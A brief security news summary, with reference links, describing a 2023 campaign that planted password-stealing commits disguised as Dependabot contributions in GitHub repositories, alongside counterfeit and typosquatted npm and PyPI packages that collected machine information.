A recent campaign has targeted GitHub accounts [1] [2] [3] [4] [5] [6] [7] [8], as well as npm and PyPI, with the goal of stealing passwords from developers. These attacks highlight the ongoing efforts to compromise open-source ecosystems and the software supply chain [7] [8].
Description
A recent campaign has compromised GitHub accounts by inserting malicious code disguised as Dependabot contributions [1] [2] [3] [4] [6] [7]. This code exfiltrates secrets to a malicious server and modifies javascript files to steal passwords entered in web forms [6] [7]. The attackers also capture GitHub secrets and variables using a GitHub Action [6] [7] [8]. The compromised accounts had their personal access tokens stolen [7], allowing the threat actors to make falsified code commits [7]. The exact method of theft is unclear [8], but it is suspected that a rogue package may have been inadvertently installed by the developers [8]. These attacks involved atypical commits to numerous public and private repositories [6].
In addition to the GitHub campaign, another campaign targeted npm and PyPI [2] [6]. Counterfeit packages were used to gather machine information and transmit it to a remote server [2] [3] [5] [6] [7]. A typosquat campaign on npm used packages masquerading as popular frameworks to collect machine information [3] [6] [7]. These activities violate the npm Acceptable Use Policy and put a strain on those responsible for maintaining clean ecosystems [2] [3] [5] [6] [7].
Conclusion
These incidents highlight the ongoing efforts by threat actors to compromise open-source ecosystems and exploit supply chains [8]. They also demonstrate the increasing complexity and obfuscation techniques used in these attacks. It is crucial to address the growing threat of generative AI in cybersecurity and take steps to mitigate these risks in the future.
References
[1] https://cyber.vumetric.com/security-news/2023/09/28/github-repositories-hit-by-password-stealing-commits-disguised-as-dependabot-contributions/
[2] https://patabook.com/technology/2023/09/28/github-repositories-hit-by-password-stealing-commits-disguised-as-dependabot-contributions/
[3] https://osintcorp.net/github-repositories-hit-by-password-stealing-commits-disguised-as-dependabot-contributions/
[4] https://itauditcybersecurity.blogspot.com/2023/09/github-repositories-hit-by-password.html
[5] https://flyytech.com/2023/09/28/github-repositories-hit-by-password-stealing-commits-disguised-as-dependabot-contributions/
[6] https://thehackernews.com/2023/09/github-repositories-hit-by-password.html
[7] https://www.redpacketsecurity.com/github-repositories-hit-by-password-stealing-commits-disguised-as-dependabot-contributions/
[8] https://beker.uk/2023/09/28/github-repositories-hit-by-password-stealing-commits-disguised-as-dependabot-contributions/